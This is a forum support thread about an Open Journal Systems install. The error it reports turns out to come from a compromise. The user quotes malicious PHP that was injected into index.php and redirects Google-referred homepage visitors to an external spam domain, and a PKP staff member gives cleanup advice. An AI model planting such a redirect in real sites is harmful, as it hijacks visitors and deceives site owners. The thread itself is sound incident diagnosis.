Error in submissions page

Enzo · February 19, 2026, 3:10pm

OJS 3.4.0.8. After the last submission (before, we had no problems) I get the following error popup: An unexpected error has occurred. Please reload the page and try again.

In Apache Error Logs I found the following errors:

GET /index.php/FE/api/v1/submissions?status%5B%5D=4&status%5B%5D=3&status%5B%5D=5&searchPhrase=&count=30&offset=0&=1771513442394 HTTP/1.1

AH01071: Got error ‘PHP message: PHP Fatal error: Uncaught RuntimeException: Unexpected data in output buffer. Maybe you have characters before an opening <?php tag? in SERVER_FOLDER/lib/pkp/lib/vendor/slim/slim/Slim/App.php:621
Stack trace:
#0 SERVER_FOLDER/lib/pkp/lib/vendor/slim/slim/Slim/App.php(317): Slim\App->finalize()
#1 SERVER_FOLDER/lib/pkp/classes/core/APIRouter.php(110): Slim\App->run()
#2 SERVER_FOLDER/lib/pkp/classes/core/Dispatcher.php(165): PKP\core\APIRouter->route()
#3 SERVER_FOLDER/lib/pkp/classes/core/PKPApplication.php(395): PKP\core\Dispatcher->dispatch()
#4 SERVER_FOLDER/index.php(39): PKP\core\PKPApplication->execute()
#5 {main}\n thrown in SERVER_FOLDER/lib/pkp/lib/vendor/slim/slim/Slim/App.php on line 621’, referer: https://WEBSITE_URL/submissions

Thank you,

Enzo

Enzo · February 20, 2026, 9:45am

Hi, I restored a backup of my website and now it works. Matching the not-working version with the original one, I noticed many differences.

This is the original root folder:

This is the not-working version:

Looking at index.php code I noticed this lines added:

<?php
// Hanya cek homepage
if ($_SERVER['REQUEST_URI'] === '/' && empty($_SERVER['QUERY_STRING'])) {
    // Cek referer
    if (isset($_SERVER['HTTP_REFERER'])) {
        // Jika referer mengandung "google" (klik dari Google)
        if (strpos($_SERVER['HTTP_REFERER'], 'google') !== false) {
            header("Location: https://diglosiaunmul.pages.dev/");
            exit;
        }
    }
}
?>

What do you suggest? Thanks

asmecher · February 20, 2026, 3:37pm

Hi @Enzo,

It looks like your OJS was hacked to promote a spammer. I’d recommend checking over the usual suspects…

Update your OJS to the latest build (currently 3.4.0-10)
Make sure the files_dir is not publicly accessible
Change any admin or manager passwords (and don’t use weak passwords)
Double-check that there is nothing unexpected in the installation – for example, we sometimes see older installs that have a 3rd party plugin installed.

It’s best to treat your installation directory as untrustworthy and only move things into it that you’ve reviewed.

Regards,
Alec Smecher
Public Knowledge Project Team

Enzo · February 20, 2026, 4:23pm

Thank you.

How can I recognize this king of plugins? Should I check just the installed plugin or also the ones in the gallery?

I guess I should change FTP passwords too. file_dir is not publicly accessible. I wonder if it is possible to modify files in root folder with an hacked OJS account.

Greetings,

Enzo

asmecher · February 20, 2026, 4:29pm

Hi @Enzo,

The report I’m thinking of is described here.

Any plugins running in the system are installed in plugins/, so if you follow the course I recommended above (treat anything in the installation as untrustworthy, only bring across what you need and have checked over) then you shouldn’t bring any unexpected plugins into the clean installation either. If you’re not sure what plugins you were running, you can compare a listing of the contents of plugins/* between the old and new installations; then install any plugins you need into the new installation using the Plugin Gallery.

Regards,
Alec Smecher
Public Knowledge Project Team

asmecher · March 2, 2026, 4:00pm

This topic was automatically closed after 10 days. New replies are no longer allowed.